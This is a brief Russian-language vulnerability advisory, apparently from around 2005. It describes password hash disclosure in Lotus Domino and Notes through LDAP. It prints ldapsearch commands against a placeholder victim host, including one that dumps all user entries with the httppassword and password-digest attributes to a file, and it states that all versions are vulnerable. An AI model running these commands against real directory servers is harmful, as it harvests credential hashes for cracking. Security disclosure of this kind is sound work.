Уязвимость, описывающая раскрытие хэшей паролей в Domino webmail о которой писали в июле 2005 получила продолжение. Дальнейший тест показал раскрытые хэшей паролей в клиенте Lotus Notes и в Domino LDAP.
Описание
Запрос персональной информации через LDAP, на, к примеру, пользователя — Big Boss, осуществляется так:
ldapsearch -h lotus.victim.com -b «ou=hq, c=us, o=victim.com» -D «cn=joe shmoe, ou=hq, c=us, o=victim.com»
-w ****** -L «cn=Dig Boss»
При этом получить дамп всех записей пользователей в файл, возможно так:
ldapsearch -h lotus.victim.com -b «ou=hq, c=us, o=victim.com» -D «cn=joe shmoe, ou=hq, c=us, o=victim.com»
-w ****** -L -l 3600 «(&(type=person)(cn=*)) httppassword passworddiggest >all.ldif»
В результате получим дамп в LDIF формате в файл all.ldif.
Уязвимы все версии.
